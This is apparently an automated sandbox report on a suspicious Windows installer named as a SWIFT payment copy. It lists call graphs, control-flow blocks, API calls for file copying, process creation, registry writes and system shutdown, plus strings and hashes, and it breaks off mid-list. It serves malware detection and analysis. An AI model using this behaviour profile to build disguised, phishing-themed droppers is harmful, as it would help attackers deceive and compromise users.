DestroyWindow 2933->2937 2934 403b3e SetClassLongA 2938 40140b 2 API calls 2934->2938 2941 403a36 SetWindowLongA 2936->2941 2942 403a47 2936->2942 2940 403e2d 2937->2940 2938->2925 2940->2935 2950 403e3d ShowWindow 2940->2950 2941->2935 2946 403af0 2942->2946 2947 403a53 GetDlgItem 2942->2947 2944 40140b 2 API calls 2951 403bc0 2944->2951 2945 403e0e DestroyWindow EndDialog 2945->2940 3003 403eea 2946->3003 2952 403a83 2947->2952 2953 403a66 SendMessageA IsWindowEnabled 2947->2953 2948 403b8a SendMessageA 2948->2935 2950->2935 2951->2944 2951->2945 2954 405be9 18 API calls 2951->2954 2965 403e83 19 API calls 2951->2965 2967 403e83 19 API calls 2951->2967 2955 403a88 2952->2955 2956 403a90 2952->2956 2957 403ad7 SendMessageA 2952->2957 2958 403aa3 2952->2958 2953->2935 2953->2952 2954->2951 3000 403e5c 2955->3000 2956->2955 2956->2957 2957->2946 2960 403ac0 2958->2960 2961 403aab 2958->2961 2964 40140b 2 API calls 2960->2964 2997 40140b 2961->2997 2962 403abe 2962->2946 2966 403ac7 2964->2966 2965->2951 2966->2946 2966->2955 2968 403c3b GetDlgItem 2967->2968 2969 403c50 2968->2969 2970 403c58 ShowWindow EnableWindow 2968->2970 2969->2970 3024 403ea5 EnableWindow 2970->3024 2972 403c82 EnableWindow 2975 403c96 2972->2975 2973 403c9b GetSystemMenu EnableMenuItem SendMessageA 2974 403ccb SendMessageA 2973->2974 2973->2975 2974->2975 2975->2973 3025 403eb8 SendMessageA 2975->3025 3026 405bc7 lstrcpynA 2975->3026 2978 403cf9 lstrlenA 2979 405be9 18 API calls 2978->2979 2980 403d0a SetWindowTextA 2979->2980 2981 401389 2 API calls 2980->2981 2982 403d1b 2981->2982 2982->2935 2982->2951 2983 403d4e DestroyWindow 2982->2983 2985 403d49 2982->2985 2983->2940 2984 403d68 CreateDialogParamA 2983->2984 2984->2940 2986 403d9b 2984->2986 2985->2935 2987 403e83 19 API calls 2986->2987 2988 403da6 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2987->2988 2989 401389 2 API calls 2988->2989 2990 403dec 2989->2990 2990->2935 2991 403df4 ShowWindow 2990->2991 2992 403ecf SendMessageA 2991->2992 2993 403e0c 2992->2993 2993->2940 2995 403ee7 2994->2995 2996 403ed8 SendMessageA 2994->2996 2995->2951 2996->2995 2998 401389 2 API calls 2997->2998 2999 401420 2998->2999 2999->2955 3001 403e63 3000->3001 3002 403e69 SendMessageA 3000->3002 3001->3002 3002->2962 3004 403f8b 3003->3004 3005 403f02 GetWindowLongA 3003->3005 3004->2935 3005->3004 3006 403f13 3005->3006 3007 403f22 GetSysColor 3006->3007 3008 403f25 3006->3008 3007->3008 3009 403f35 SetBkMode 3008->3009 3010 403f2b SetTextColor 3008->3010 3011 403f53 3009->3011 3012 403f4d GetSysColor 3009->3012 3010->3009 3013 403f64 3011->3013 3014 403f5a SetBkColor 3011->3014 3012->3011 3013->3004 3015 403f77 DeleteObject 3013->3015 3016 403f7e CreateBrushIndirect 3013->3016 3014->3013 3015->3016 3016->3004 3018 405be9 18 API calls 3017->3018 3019 403e8e SetDlgItemTextA 3018->3019 3019->2934 3022 401390 3020->3022 3021 4013fe 3021->2930 3021->2948 3022->3021 3023 4013cb MulDiv SendMessageA 3022->3023 3023->3022 3024->2972 3025->2975 3026->2978 4089 4027b0 4090 402a0c 18 API calls 4089->4090 4091 4027b6 4090->4091 4092 4027f1 4091->4092 4093 4027da 4091->4093 4099 40268f 4091->4099 4094 402807 4092->4094 4095 4027fb 4092->4095 4096 4027df 4093->4096 4102 4027ee 4093->4102 4098 405be9 18 API calls 4094->4098 4097 402a0c 18 API calls 4095->4097 4103 405bc7 lstrcpynA 4096->4103 4097->4102 4098->4102 4102->4099 4104 405b25 wsprintfA 4102->4104 4103->4099 4104->4099 4105 401eb2 4106 402a29 18 API calls 4105->4106 4107 401eb9 4106->4107 4108 405ec2 2 API calls 4107->4108 4109 401ebf 4108->4109 4111 401ed1 4109->4111 4112 405b25 wsprintfA 4109->4112 4112->4111 3102 4015b3 3103 402a29 18 API calls 3102->3103 3104 4015ba 3103->3104 3105 40574e 4 API calls 3104->3105 3117 4015c2 3105->3117 3106 40161c 3108 401621 3106->3108 3109 40164a 3106->3109 3107 4056e5 CharNextA 3107->3117 3129 401423 3108->3129 3111 401423 25 API calls 3109->3111 3118 401642 3111->3118 3116 401633 SetCurrentDirectoryA 3116->3118 3117->3106 3117->3107 3119 401604 GetFileAttributesA 3117->3119 3121 40540f 3117->3121 3124 405375 CreateDirectoryA 3117->3124 3133 4053f2 CreateDirectoryA 3117->3133 3119->3117 3122 405f57 5 API calls 3121->3122 3123 405416 3122->3123 3123->3117 3125 4053c2 3124->3125 3126 4053c6 GetLastError 3124->3126 3125->3117 3126->3125 3127 4053d5 SetFileSecurityA 3126->3127 3127->3125 3128 4053eb GetLastError 3127->3128 3128->3125 3130 404eb3 25 API calls 3129->3130 3131 401431 3130->3131 3132 405bc7 lstrcpynA 3131->3132 3132->3116 3134 405402 3133->3134 3135 405406 GetLastError 3133->3135 3134->3117 3135->3134 4113 4016b3 4114 402a29 18 API calls 4113->4114 4115 4016b9 GetFullPathNameA 4114->4115 4116 4016d0 4115->4116 4122 4016f1 4115->4122 4119 405ec2 2 API calls 4116->4119 4116->4122 4117 401705 GetShortPathNameA 4118 4028be 4117->4118 4120 4016e1 4119->4120 4120->4122 4123 405bc7 lstrcpynA 4120->4123 4122->4117 4122->4118 4123->4122 4124 402336 4125 40233c 4124->4125 4126 402a29 18 API calls 4125->4126 4127 40234e 4126->4127 4128 402a29 18 API calls 4127->4128 4129 402358 RegCreateKeyExA 4128->4129 4130 402382 4129->4130 4132 4028be 4129->4132 4131 40239a 4130->4131 4133 402a29 18 API calls 4130->4133 4134 402a0c 18 API calls 4131->4134 4136 4023a6 4131->4136 4137 402393 lstrlenA 4133->4137 4134->4136 4135 4023c1 RegSetValueExA 4139 4023d7 RegCloseKey 4135->4139 4136->4135 4138 402e8e 33 API calls 4136->4138 4137->4131 4138->4135 4139->4132 4141 402836 4142 402a0c 18 API calls 4141->4142 4143 40283c 4142->4143 4144 40284a 4143->4144 4145 40286d 4143->4145 4146 40268f 4143->4146 4144->4146 4149 405b25 wsprintfA 4144->4149 4145->4146 4147 405be9 18 API calls 4145->4147 4147->4146 4149->4146 4150 4014b7 4151 4014bd 4150->4151 4152 401389 2 API calls 4151->4152 4153 4014c5 4152->4153 3136 401e38 3137 402a29 18 API calls 3136->3137 3138 401e3e 3137->3138 3139 404eb3 25 API calls 3138->3139 3140 401e48 3139->3140 3152 405427 CreateProcessA 3140->3152 3142 401ea4 CloseHandle 3144 40268f 3142->3144 3143 401e6d WaitForSingleObject 3145 401e4e 3143->3145 3146 401e7b GetExitCodeProcess 3143->3146 3145->3142 3145->3143 3145->3144 3155 405f93 3145->3155 3148 401e98 3146->3148 3149 401e8d 3146->3149 3148->3142 3151 401e96 3148->3151 3159 405b25 wsprintfA 3149->3159 3151->3142 3153 405462 3152->3153 3154 405456 CloseHandle 3152->3154 3153->3145 3154->3153 3156 405fb0 PeekMessageA 3155->3156 3157 405fc0 3156->3157 3158 405fa6 DispatchMessageA 3156->3158 3157->3143 3158->3156 3159->3151 4154 401d38 GetDC GetDeviceCaps 4155 402a0c 18 API calls 4154->4155 4156 401d54 MulDiv 4155->4156 4157 402a0c 18 API calls 4156->4157 4158 401d69 4157->4158 4159 405be9 18 API calls 4158->4159 4160 401da2 CreateFontIndirectA 4159->4160 4161 4024eb 4160->4161 4162 402539 4163 402a0c 18 API calls 4162->4163 4166 402543 4163->4166 4164 4025b9 4165 402577 ReadFile 4165->4164 4165->4166 4166->4164 4166->4165 4167 4025bb 4166->4167 4168 4025cb 4166->4168 4171 405b25 wsprintfA 4167->4171 4168->4164 4170 4025e1 SetFilePointer 4168->4170 4170->4164 4171->4164 3396 40173e 3397 402a29 18 API calls 3396->3397 3398 401745 3397->3398 3399 4058cd 2 API calls 3398->3399 3400 40174c 3399->3400 3401 4058cd 2 API calls 3400->3401 3401->3400 4172 40193f 4173 402a29 18 API calls 4172->4173 4174 401946 lstrlenA 4173->4174 4175 4024eb 4174->4175

                                                                                                                        Executed Functions

                                                                                                                        Function 0040312A Relevance: 84.3, APIs: 27, Strings: 21, Instructions: 315stringfilecomCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 0 40312a-403160 SetErrorMode GetVersion 1 403162-40316a call 405f57 0->1 2 403173 0->2 1->2 7 40316c 1->7 4 403178-40318b call 405ee9 lstrlenA 2->4 9 40318d-4031ff call 405f57 * 2 #17 OleInitialize SHGetFileInfoA call 405bc7 GetCommandLineA call 405bc7 GetModuleHandleA 4->9 7->2 18 403201-403206 9->18 19 40320b-403220 call 4056e5 CharNextA 9->19 18->19 22 403289-40328d 19->22 23 403222-403225 22->23 24 40328f 22->24 25 403227-40322b 23->25 26 40322d-403235 23->26 27 4032a2-4032ba GetTempPathA call 4030f9 24->27 25->25 25->26 28 403237-403238 26->28 29 40323d-403240 26->29 37 4032e0-4032fa DeleteFileA call 402c55 27->37 38 4032bc-4032da GetWindowsDirectoryA lstrcatA call 4030f9 27->38 28->29 31 403242-403246 29->31 32 403279-403286 call 4056e5 29->32 35 403258-40325e 31->35 36 403248-403251 31->36 32->22 49 403288 32->49 40 403270-403277 35->40 41 403260-403269 35->41 36->35 44 403253 36->44 50 403361-403370 ExitProcess OleUninitialize 37->50 51 4032fc-403302 37->51 38->37 38->50 40->32 47 403291-40329d call 405bc7 40->47 41->40 46 40326b 41->46 44->35 46->40 47->27 49->22 55 403485-40348b 50->55 56 403376-403386 call 405488 ExitProcess 50->56 53 403351-403358 call 40361a 51->53 54 403304-40330d call 4056e5 51->54 62 40335d 53->62 69 403318-40331a 54->69 60 403491-4034ae call 405f57 * 3 55->60 61 403528-403530 55->61 84 4034b0-4034b2 60->84 85 4034f8-403506 call 405f57 60->85 64 403532 61->64 65 403536-40353a ExitProcess 61->65 62->50 64->65 71 40331c-403326 69->71 72 40330f-403315 69->72 75 403328-403335 call 40579b 71->75 76 40338c-4033a0 call 40540f lstrcatA 71->76 72->71 74 403317 72->74 74->69 75->50 83 403337-40334d call 405bc7 * 2 75->83 86 4033a2-4033a8 lstrcatA 76->86 87 4033ad-4033c7 lstrcatA lstrcmpiA 76->87 83->53 84->85 90 4034b4-4034b6 84->90 97 403514-40351f ExitWindowsEx 85->97 98 403508-403512 85->98 86->87 87->50 89 4033c9-4033cc 87->89 94 4033d5 call 4053f2 89->94 95 4033ce-4033d3 call 405375 89->95 90->85 96 4034b8-4034ca GetCurrentProcess 90->96 105 4033da-4033e7 SetCurrentDirectoryA 94->105 95->105 96->85 111 4034cc-4034ee 96->111 97->61 104 403521-403523 call 40140b 97->104 98->97 98->104 104->61 109 4033f4-40340e call 405bc7 105->109 110 4033e9-4033ef call 405bc7 105->110 116 403413-40342f call 405be9 DeleteFileA 109->116 110->109 111->85 119 403470-403477 116->119 120 403431-403441 CopyFileA 116->120 119->116 122 403479-403480 call 405915 119->122 120->119 121 403443-403463 call 405915 call 405be9 call 405427 120->121 121->119 131 403465-40346c CloseHandle 121->131 122->50 131->119
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNELBASE ref: 00403150
                                                                                                                        • GetVersion.KERNEL32 ref: 00403156
                                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                                                                                                        • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004031A7
                                                                                                                        • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                                                                                                        • GetCommandLineA.KERNEL32(pkfcbfzkpkrqtkjcmcyn Setup,NSIS Error), ref: 004031D8
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000), ref: 004031EB
                                                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00409168), ref: 00403216
                                                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                                                                                                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                                                                                                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                                                                                                        • ExitProcess.KERNEL32(00000020), ref: 00403361
                                                                                                                        • OleUninitialize.OLE32(00000020), ref: 00403366
                                                                                                                        • ExitProcess.KERNEL32 ref: 00403386
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000,00000020), ref: 00403399
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000,00000020), ref: 004033A8
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe",00000000,00000020), ref: 004033B3
                                                                                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 004033BF
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                                                                                                        • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                                                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe,00428C58,00000001), ref: 00403439
                                                                                                                        • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403517
                                                                                                                        • ExitProcess.KERNEL32 ref: 0040353A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitFileProcesslstrcat$Handle$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                                                        • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$(`_$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$pkfcbfzkpkrqtkjcmcyn Setup$~nsu
                                                                                                                        • API String ID: 1031542678-1672760224
                                                                                                                        • Opcode ID: 86d32bbf67157276347dd15ba2004fb4ddc1ee64470de8bb5c85f9652657bc9c
                                                                                                                        • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                                                                                                        • Opcode Fuzzy Hash: 86d32bbf67157276347dd15ba2004fb4ddc1ee64470de8bb5c85f9652657bc9c
                                                                                                                        • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004054EC Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 156filestringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 376 4054ec-405507 call 40579b 379 405520-40552a 376->379 380 405509-40551b DeleteFileA 376->380 382 40552c-40552e 379->382 383 40553e-40554c call 405bc7 379->383 381 4056b4-4056b7 380->381 384 405534-405538 382->384 385 40565f-405665 382->385 391 40555b-40555c call 405701 383->391 392 40554e-405559 lstrcatA 383->392 384->383 384->385 385->381 387 405667-40566a 385->387 389 405674-40567c call 405ec2 387->389 390 40566c-405672 387->390 389->381 399 40567e-405693 call 4056ba call 40587f RemoveDirectoryA 389->399 390->381 394 405561-405564 391->394 392->394 397 405566-40556d 394->397 398 40556f-405575 lstrcatA 394->398 397->398 400 40557a-405598 lstrlenA FindFirstFileA 397->400 398->400 415 405695-405699 399->415 416 4056ac-4056af call 404eb3 399->416 401 405655-405659 400->401 402 40559e-4055b5 call 4056e5 400->402 401->385 406 40565b 401->406 409 4055c0-4055c3 402->409 410 4055b7-4055bb 402->410 406->385 413 4055c5-4055ca 409->413 414 4055d6-4055e4 call 405bc7 409->414 410->409 412 4055bd 410->412 412->409 418 405634-405646 FindNextFileA 413->418 419 4055cc-4055ce 413->419 426 4055e6-4055ee 414->426 427 4055fb-40560a call 40587f DeleteFileA 414->427 415->390 421 40569b-4056aa call 404eb3 call 405915 415->421 416->381 418->402 424 40564c-40564f FindClose 418->424 419->414 422 4055d0-4055d4 419->422 421->381 422->414 422->418 424->401 426->418 430 4055f0-4055f9 call 4054ec 426->430 435 40562c-40562f call 404eb3 427->435 436 40560c-405610 427->436 430->418 435->418 438 405612-405622 call 404eb3 call 405915 436->438 439 405624-40562a 436->439 438->418 439->418
                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                                                                                                        • lstrcatA.KERNEL32(?,00409010,?,C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                                                                                                        • lstrlenA.KERNEL32(?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                                                                                                        • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,?,?,00409010,?,C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                                                                                                        • FindNextFileA.KERNELBASE(?,00000010,000000F2,?), ref: 0040563E
                                                                                                                        • FindClose.KERNELBASE(?), ref: 0040564F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                        • String ID: "C:\Users\user\Desktop\Payment_Copy_[SWIFT_COPY].exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb8D54.tmp\*.*$\*.*
                                                                                                                        • API String ID: 2035342205-1984511154
                                                                                                                        • Opcode ID: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
                                                                                                                        • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                                                                                                        • Opcode Fuzzy Hash: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
                                                                                                                        • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405EC2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 669 405ec2-405ed6 FindFirstFileA 670 405ee3 669->670 671 405ed8-405ee1 FindClose 669->671 672 405ee5-405ee6 670->672 671->672
                                                                                                                        APIs
                                                                                                                        • FindFirstFileA.KERNELBASE(?,0042C0F0,C:\,004057DE,C:\,C:\,00000000,C:\,C:\,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405ECD
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00405ED9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1391021678.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1390999597.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391042719.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391063402.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1391191008.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Payment_Copy_[SWIFT_COPY].jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID: C:\
                                                                                                                        • API String ID: 2295610775-3404278061
                                                                                                                        • Opcode ID: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                                                        • Instruction ID: 29e96ad6865097314c3b976147751eb8d0045a3fb470af3f15328f49aab52e00
                                                                                                                        • Opcode Fuzzy Hash: 3bbfcd8d52008985354620b371f401d232f9e70872954503675e198784383319
                                                                                                                        • Instruction Fuzzy Hash: 11D0C9319185209BC2105768AD0885B6A59DB593357108A72B465F62E0CA7499528AEA
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004039B0 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 132 4039b0-4039c2 133 403b03-403b12 132->133 134 4039c8-4039ce 132->134 136 403b61-403b76 133->136 137 403b14-403b5c GetDlgItem * 2 call 403e83 SetClassLongA call 40140b 133->137 134->133 135 4039d4-4039dd 134->135 138 4039f2-4039f5 135->138 139 4039df-4039ec SetWindowPos 135->139 141 403bb6-403bbb call 403ecf 136->141 142 403b78-403b7b 136->142 137->136 144 4039f7-403a09 ShowWindow 138->144 145 403a0f-403a15 138->145 139->138 150 403bc0-403bdb 141->150 147 403b7d-403b88 call 401389 142->147 148 403bae-403bb0 142->148 144->145 151 403a31-403a34 145->151 152 403a17-403a2c DestroyWindow 145->152 147->148 169 403b8a-403ba9 SendMessageA 147->169 148->141 149 403e50 148->149 157 403e52-403e59 149->157 155 403be4-403bea 150->155 156 403bdd-403bdf call 40140b 150->156 160 403a36-403a42 SetWindowLongA 151->160 161 403a47-403a4d 151->161 158 403e2d-403e33 152->158 165 403bf0-403bfb 155->165 166 403e0e-403e27 DestroyWindow EndDialog 155->166 156->155 158->149 163 403e35-403e3b 158->163 160->157 167 403af0-403afe call 403eea 161->167 168 403a53-403a64 GetDlgItem 161->168 163->149 171 403e3d-403e46 ShowWindow 163->171 165->166 172 403c01-403c4e call 405be9 call 403e83 * 3 GetDlgItem 165->172 166->158 167->157 173 403a83-403a86 168->173 174 403a66-403a7d SendMessageA IsWindowEnabled 168->174 169->157 171->149 202 403c50-403c55 172->202 203 403c58-403c94 ShowWindow EnableWindow call 403ea5 EnableWindow 172->203 177 403a88-403a89 173->177 178 403a8b-403a8e 173->178 174->149 174->173 179 403ab9-403abe call 403e5c 177->179 180 403a90-403a96 178->180 181 403a9c-403aa1 178->181 179->167 183 403ad7-403aea SendMessageA 180->183 184 403a98-403a9a 180->184 181->183 185 403aa3-403aa9 181->185 183->167 184->179 188 403ac0-403ac9 call 40140b 185->188 189 403aab-403ab1 call 40140b 185->189 188->167 199 403acb-403ad5 188->199 198 403ab7 189->198 198->179 199->198 202->203 206 403c96-403c97 203->206 207 403c99 203->207 208 403c9b-403cc9 GetSystemMenu EnableMenuItem SendMessageA 206->208 207->208 209 403ccb-403cdc SendMessageA 208->209 210 403cde 208->210 211 403ce4-403d1d call 403eb8 call 405bc7 lstrlenA call 405be9 SetWindowTextA call 401389 209->211 210->211 211->150 220 403d23-403d25 211->220 220->150 221 403d2b-403d2f 220->221 222 403d31-403d37 221->222 223 403d4e-403d62 DestroyWindow 221->223 222->149 224 403d3d-403d43 222->224 223->158 225 403d68-403d95 CreateDialogParamA 223->225 224->150 226 403d49 224->226 225->158 227 403d9b-403df2 call 403e83 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 225->227 226->149 227->149 232 403df4-403e0c ShowWindow call 403ecf 227->232 232->158
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039EC
                                                                                                                        • ShowWindow.USER32(?), ref: 00403A09
                                                                                                                        • DestroyWindow.USER32 ref: 00403A1D
                                                                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A39
                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00403A5A
                                                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A6E
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403A75
                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403B23
                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403B2D
                                                                                                                        • SetClassLongA.USER32(?,000000F2,?), ref: 00403B47
                                                                                                                        • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B98
                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403C3E
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00403C5F
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403C71
                                                                                                                        • EnableWindow.USER32(?,?), ref: 00403C8C
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA2
                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 00403CA9
                                                                                                                        • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC1
                                                                                                                        • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD4
